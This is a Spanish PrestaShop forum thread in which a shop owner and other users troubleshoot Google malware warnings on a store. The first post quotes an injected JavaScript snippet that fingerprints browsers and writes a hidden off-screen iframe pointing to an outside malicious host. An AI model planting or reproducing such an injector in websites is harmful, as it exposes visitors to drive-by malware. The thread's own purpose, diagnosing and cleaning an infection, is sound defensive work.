Web con código malicioso detectado

[kennysesale]

Hola comunidad, a ver si me podeis echar una mano. 

 

Desde el viernes por la noche, google me ha estado mandando advertencias de que mi web contiene código malicioso. A través de la página webmaster tools, compruebo que es así y me indica varias web dónde se ha detectado. Lo primero que hago es cambiar las claves de ftp, admin y panel de control y en paralelo avisar a mi hosting. 

 

El caso es que me pongo a buscar la infección con las páginas unmaskparasites y sucuri y en ninguna me indican el código que me está afectando, pero en uno de los escaneos me muestra un script alojado en la carpeta cache de mi tema. Lo abro y descubro este código:

Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/
*/
function getCookie(name) {
var Smilepize = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return Smilepize ? decodeURIComponent(Smilepize[1]) : undefined;
}
function Pleos_Aflertuder() {
var r_amblartide = navigator.userAgent;
var Yellowgrand = (r_amblartide.indexOf("IEMobile") > -1 || r_amblartide.indexOf("Windows NT 6.3") > -1 || r_amblartide.indexOf("Chrome") > -1 || r_amblartide.indexOf("Windows") < +1);
var Ultrastilus = (getCookie("Garamg18usality") === undefined);
if (!Yellowgrand && Ultrastilus) {
document.write('<iframe src="http://quqylife.van85.com/bibnoilsar16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe>');
var date = new Date( new Date().getTime() + 66*60*60*1000 );
document.cookie="Garamg18usality=1; path=/; expires="+date.toUTCString();
}

Mi siguiente paso ha sido desactivar la cache y CCC para descubrir esta intrusión pero mi sorpresa es que en todo el servidor no se encuentra nada de este código. 

 

He entrado al panel de control plesk a ver si algún archivo ha sido modificado recientemente y nada, todo está en orden. He revisado el .httacces y tampoco veo nada raro

 

El dominio afectado es http://puntodete.com y funciona bajo prestashop 1.5.3 

 

A ver si me podéis echar una mano

 

Muchas gracias de antemano

 

Saludos

[Soyons Solidaire]

Le site Web que vous allez ouvrir contient un logiciel malveillant

Les individus malveillants actuellement à l'œuvre sur le site puntodete.com pourraient tenter d'installer des programmes dangereux sur votre ordinateur, de manière à récupérer vos informations (par exemple des photos, des mots de passe, des messages et des numéros de carte de paiement) sans votre autorisation, ou à les supprimer.

Edited September 14, 2014 by G.Solidarité (see edit history)

[kennysesale]

Hola,

 

El hosting aún no me ha dado respuesta, mientras intento resolver el problema, porque no creo que ellos me den soporte a prestashop.

 

En cuanto a dejar la URL, me imagino que sería necesaria para poder recibir ayuda. Me recomiendas que la quite?

 

Gracias y sigo por aquí, no me he ido

 

Saludos

[kennysesale]

Voy a revisar mi equipo pero el problema según Google reside en mi web, haciendo una búsqueda del tipo site:www.xxxxx todos los resultados se muestran con la bandera de sitio inseguro.

 

Una duda, es posible que sea el servidor el que esté por así decirlo "atacado" y mi web limpia?

 

Gracias nuevamente por la ayuda

[ventura]

http://sitecheck.sucuri.net/results/puntodete.com

 

que tipo de hosting tienes, compartido?, como accedes a los archivos por ftp con filezilla o similar?

[kennysesale]

Es un hosting compartido y hasta ahora he accedido vía filezilla y dreamweaver.

[ventura]

tu hosting deberia darte una solucion, Tienes backup de la instalacion.? Lo primordial ahora es lo que te comenta statictic procura tener desinfectados todos los equipos desde los que accedes al hosting y cambia contraseñas de ftp y admin

[kennysesale]

He hecho todo lo que me habéis recomendado. He realizado un análisis profundo de mi equipo y tengo preparado un Backup a falta de obtener soporte de mi hosting, debe ser que durante el fin de semana no resuelven incidencias . A primera hora contactaré con ellos para que pongan una solución y os comento el final de esta historia. 

 

He cambiado todas las claves nuevamente a excepción de la BD, ¿sería recomendable hacerlo? 

 

Muchas gracias por las ayudas 

[kennysesale]

Buenos días,

 

Tras hablar con soporte técnico del hosting, me dicen que el servidor está limpio y el problema reside en mi web.

 

Los dominios que indica el reporte de Google, son también de mi propiedad y actualmente apuntan al dominio principal que es el que indico en el primer post.

En la web sigo sin encontrar nada, están todos los archivos en mi pc y he realizado todo tipo de búsquedas. (Iframe, get.coockie...) he revisado los .tpl a ver sí encuentro algo pero todo parece normal.

 

 

Alguna idea?

 

Gracias y salu2

[moraira]

Bueno todos estos consejos es lo que hay que hacer, pero lo primero de todo quita el codigo malicioso, que para mi es el mailto que tienes en la web y la siguiente linea, es decir viendo el código de tu web la linea 792 la que pone href="ma......

 

desactiva el modulo donde pones los datos de contacto, disculpa que no lo he usado nunca y no se exactamente cual es

[kennysesale]

Gracias Moraira, creeme que ando cómo loco búscando el código para eliminarlo. Esas lineas que comentas,  me tenían mosqueado en un principio en el .tpl del módulo en cuestión me he encontrado estas lineas:

<!-- MODULE Block contact infos -->
<div id="block_contact_infos">
	<h4 class="title_block">{l s='Contact us' mod='blockcontactinfos'}</h4>
	<ul>
		{if $blockcontactinfos_company != ''}<li><strong>{$blockcontactinfos_company|escape:'htmlall':'UTF-8'}</strong></li>{/if}
		{if $blockcontactinfos_address != ''}<li><pre>{$blockcontactinfos_address|escape:'htmlall':'UTF-8'}</pre></li>{/if}
		{if $blockcontactinfos_phone != ''}<li>{l s='Tel:' mod='blockcontactinfos'} {$blockcontactinfos_phone|escape:'htmlall':'UTF-8'}</li>{/if}
		{if $blockcontactinfos_email != ''}<li>{l s='Email:' mod='blockcontactinfos'} {mailto address=$blockcontactinfos_email|escape:'htmlall':'UTF-8' encode="hex"}</li>{/if}
	</ul>

Al eliminar el encode del código para ver que era lo que codificaba, todo parecía normal, se mostraba tal que así:

<li>Email: <a href="mailto:[email protected]" >[email protected]</a></li>	</ul>
</div>
 

he procedido a desactivar este módulo de todos mosdos y otros dos más para ver con más claridad el código e intentar descubrir el problema. Al pasar nuevamente la web por sucuri, nada ha cambiado (Hice un force re-scan). 

 

El sábado, noté un cambió en la página que en principio no dí importancia pero puede estar relacionado con el problema. En ciertos navegadores, las categorías de la tienda, aparecían desplegadas por completo y el slider central a modo de imágenes estáticas una debajo de la otra. Realicé una limpieza cómo hago habitualmente (prestashop Cleaner) y desapareció el problema. Hoy revisando el código me encuentro este fragmento:

<script type="text/javascript">
		// <![CDATA[
			// we hide the tree only if JavaScript is activated
			$('div#categories_block_left ul.dhtml').hide();
		// ]]>
		</script>

No se si tiene mucho que ver, pero ando ya bastante perdido y todo me parece sospechoso. 

 

Voy a seguir investigando, en el hosting me han dicho que los backup que tenemos pueden contener este problema y realizar uno más antiguo sería un gran inconveniente ya que entre pedidos, actualización de productos y demás me causaría más problemas aún. 

 

Os agradezco el interés y la ayuda, os sigo contando el avance del tema ¡

 

Saludos

[kennysesale]

En efecto que mis equipos aparezcan limpios no significa que lo estén pero al menos no he detectado nada anómalo. Ahora mi equipo tiene el modo paranoico ON. con su firewall para monitorizar, anti virus al día y anti malware.

 

A la configuración de prestashop accedo desde dos equipos siempre con chrome. Ahora mismo 1, el que consideró más seguro y actualizado. Los complementos y navegador del menos seguro son socialbro y Google docs. De haberse producido una infección apuesto por este equipo aunque en ninguno se ha instalado nada últimamente.

Como medida cautelar, no he vuelto a acceder a la web desde esta ubicación.

 

En firefox utilizo firebug únicamente pero hace tiempo que no lo uso y es más para visualizar frontend. No suelo acceder al admin con este navegador.

 

Me quedo tranquilo al saber que ese código está bien, veo un hide y me mosqueo

Como información adicional, he seguido haciendo análisis en otras web de detección de malware , y salvó el aviso de que Google me tiene marcado, han dado la web como segura salvo algún enlace ( legal y puesto por mi) y no como amenaza, si no como sospechoso.

 

Cabe la posibilidad que me hayan etiquetado la web por error?

[rasta362]

Hola,  quien te da servicio de hosting, yo tuve un problema similar en un shop de relojeria y fue a traves del servidor

[kennysesale]

He eliminado los enlaces temporalmente y solicitado a Google una revisión a ver si sigue dando positivo o me dan más pistas sobre este código que han detectado. Mientras tanto sigo buscando las líneas en cuestión que ninguna página me ha mostrado aún. 

 

Mi servidor de Hosting es profesional Hosting Xavier y según me han dicho está todo bien. SI veo que no aparece nada por la web, seguiré insistiendo para que se pongan a fondo con el tema. 

 

Saludos

[rasta362]

en un compartido no tienes acceso al log de errores etc.  al menos los que yo conozco. pide que a ver si te los pueden facilitar, si te dicen que no piensa mal. y se te los facilitan puedes intentar ver el registro de actividad a ver si encuentras algo raro.

[kennysesale]

Así haré, sospecho que puede tratarse del hosting pero no descarto que haya código incrustado. Voy a solicitar el registro de actividad a ver si soy capaz de averiguar algo a través de él. 

Mientras tanto sigo en busca del código malicioso a la espera de que google nuevamente revise mi web y me aporte algo de luz al asunto. 

 

Muchas gracias y saludos ¡

[rasta362]

De nada, he estado en tu situación y no es agradable

 

suerte.

[kennysesale]

Hola de nuevo, parece que tras solicitar la revisión google ha dado mi web por buena. 

 

No tengo muy claro si ha sido un error o realmente había algo escondido en mi web. He desactivado 4 módulos (zopim, addshoper, eu coockie law y el módulo de información de contacto), borrado los dos links de la página principal (llevan 3 años sin problemas, habrá que ver que pasa con ellos) y cambiado todas las claves. 

 

Por el momento está todo correcto, Ahora voy a volver a activar todo revisando uno a uno cada módulo previo backup ya no me pilla otra así.

 

Muchas gracias por vuestras ayudas, el no sentirse solo ante estos problemas lo hace todo más llevadero.

 

Voy a llevar a cabo estas acciones, resumo el procedimiento que he seguido y en cuanto vea que todo está normalizado doy el tema por solucionado. 

 

Nuevamente muchas gracias por los aportes

 

Saludos

[nadie]

Hola de nuevo, parece que tras solicitar la revisión google ha dado mi web por buena. 

 

No tengo muy claro si ha sido un error o realmente había algo escondido en mi web. He desactivado 4 módulos (zopim, addshoper, eu coockie law y el módulo de información de contacto), borrado los dos links de la página principal (llevan 3 años sin problemas, habrá que ver que pasa con ellos) y cambiado todas las claves. 

 

Por el momento está todo correcto, Ahora voy a volver a activar todo revisando uno a uno cada módulo previo backup ya no me pilla otra así.

 

Muchas gracias por vuestras ayudas, el no sentirse solo ante estos problemas lo hace todo más llevadero.

 

Voy a llevar a cabo estas acciones, resumo el procedimiento que he seguido y en cuanto vea que todo está normalizado doy el tema por solucionado. 

 

Nuevamente muchas gracias por los aportes

 

Saludos

 

A mi me salta la alerta (al acceder a tu web) del antivirus que tengo instalado, en mi caso el antivirus que tengo instalado en mi equipo se llama Baidu Antivirus

Edited September 16, 2014 by nadie (see edit history)

[kennysesale]

Gracias nadie, he probado este antivirus y zas, pantallazo al acceder a la web. AVG y Mcafee no me han avisado. 

 

Estaré atento y voy a seguir buscando, por ahora google me ha devuelto este mensaje:

http://puntodete.com/: No malware detected

15 de septiembre de 2014

Congratulations! Google has received and processed your malware review request. We did not detect any malware on your site.

As a result, we're removing the malware warning from your site. This may take some time to happen. (You can check the status of your malware review at any time using Webmaster Tools.)

Salu2

[nadie]

Gracias nadie, he probado este antivirus y zas, pantallazo al acceder a la web. AVG y Mcafee no me han avisado. 

 

Estaré atento y voy a seguir buscando, por ahora google me ha devuelto este mensaje:

http://puntodete.com/: No malware detected

15 de septiembre de 2014

Congratulations! Google has received and processed your malware review request. We did not detect any malware on your site.

As a result, we're removing the malware warning from your site. This may take some time to happen. (You can check the status of your malware review at any time using Webmaster Tools.)

Salu2

 

Ahora ya no me salta el antivirus al acceder a tu web

[kennysesale]

Hola de nuevo, 

 

Os cuento, hoy parece que todo está bien, me han llegado emails de google, addwords y demás sitios dónde se me listó como dominio peligroso o sospechoso. Todos me dicen que la web está limpia y vuelve a la normalidad.

 

Ahora ya no me salta el antivirus al acceder a tu web

 

 

Me tiene mosqueado ese aviso del antivirús, porque a mi también me saltó ayer. Cuando accedí por segunda vez, al haber visitado con anterioridad la web, está vez no me saltó ni me avisó de ningún modo. Debe ser que al acceder concedí permiso y ya no me dice nada. Debo decir que con Avira que comparte motor (creo), no da ningún aviso. 

 

Aunque no tiene nada que ver con prestashop, creo que puede servir a alguien a entender cómo funciona esto de las black list. Mi apreciación es que la mayoría de sitios, no realizan un escaneo y aunque lo hagan se limitan a decir lo mismo que dice google. Por ejemplo, yo tengo todos los dominios redirigidos al principal, siempre carga la misma página, pues bien, si se accede a la web mediante el .es o .org el aviso sigue estando y el antivirus vuelve a detectar el troyano WTF ¡ 

Quiero pensar que esto es porque estos dominios no  he vuelto a pedir que los revisen por lo que al estar en una black list saltan todas las alarmas, en realidad Baidu parece que no escanea la web, es como si cogiera directamente los datos de su BD y hasta que no se actualice es posible que siga saltando aunque la web esté limpia. 

 

Os sigo informando como termina la historia

 

Saludos¡

 

De momento sigo muy pendiente del avance y estoy realizando todos los cambios con mucho tacto para detectar si realmente había tal amenaza, dónde está oculta. 

 

Los pasos que he seguido para "Limpiar la web" han sido:

 

 

• Cambiar claves de todos los accesos
• Pedir ayuda en el foro
• Avisar al Hosting
• Descargar completamente el sitio para analizar todos los archivos
• Deshabilitar plugin. En mi caso han sido 4 Zopim, EU Cookie Law, Addshoper y el blockcontactinfo que viene por defecto en prestashop
• Borrar un par de links de la web principal. (Llevaban más de 3 años, habrá que ver si ocurre algo con ellos)
• Escanear la web mediante las aplicaciones disponibles en linea. 9 en total (Si creéis que es necesario os dejo los links)
• Avisar a google mediante webmaster tools que todo me aparecía en orden

Como veis en ningún momento ha aparecido el código por lo que seguiré atento aunque tengo la impresión que ha sido un error por parte de google. Lo confirmaré cuando tenga todo activado nuevamente y no haya aviso de malware. 

[kennysesale]

Buenas kenny, me alegro de que ya esté todo ok... una pregunta si no es mucha indiscreción. Esos enlaces que te daban como sospechosos ¿cómo los has metido y dónde?.

 

Un saludo

 

No es indiscrección ¡ gracias al foro he salido del atolladero.

Los enlaces aún no los he colocado. Voy a dejarlos para el último paso. 

 

Es una inclusión sencilla mediante html con href en una imagen. Son dos directorios de empresas y me he llevado una sorpresa que me ha hecho pensar que tal vez google no estaba equivocado  Una de las web está incluida en una blacklist. Al pasarla por el escaner de susuri han saltado las alarmas ¡¡¡

 

Voy a repasar esto que me da la sensación que va a ser el motivo. Gracias Statictic, me has ahorrado volver a meter la pata ¡¡

 

Saludos

[nadie]

No es indiscrección ¡ gracias al foro he salido del atolladero.

Los enlaces aún no los he colocado. Voy a dejarlos para el último paso. 

 

Es una inclusión sencilla mediante html con href en una imagen. Son dos directorios de empresas y me he llevado una sorpresa que me ha hecho pensar que tal vez google no estaba equivocado  Una de las web está incluida en una blacklist. Al pasarla por el escaner de susuri han saltado las alarmas ¡¡¡

 

Voy a repasar esto que me da la sensación que va a ser el motivo. Gracias Statictic, me has ahorrado volver a meter la pata ¡¡

 

Saludos

 

Puedes decirme la url en concreto que esta dentro de la lista negra, para comprobar un asunto. (Si no quieres decirla publicamente cosa que entiendo perfectamente, dimelo por privado)

[kennysesale]

La verdad es que ni se me había ocurrido meterlo en .tpl, si los vuelvo a colocar, lo haré de esa manera aunque siendo sincero, me plantearé si merece la pena poner en compromiso el sitio. Es algo a valorar pero gracias por el apunte, tomo nota para el futuro y nunca mais href

 

Sobre el enlace, no tengo problema en compartirlo, son de directorios de empresas que en principio son serios pero por no tachar a nadie de malware, y pensando que le puede haber ocurrido lo mismo que a mi, te  pasaré por privado la url. No obstante, si hay interés debido a  que muchas web apuntadas a este directorio, no me opongo a compartirlo públicamente ¡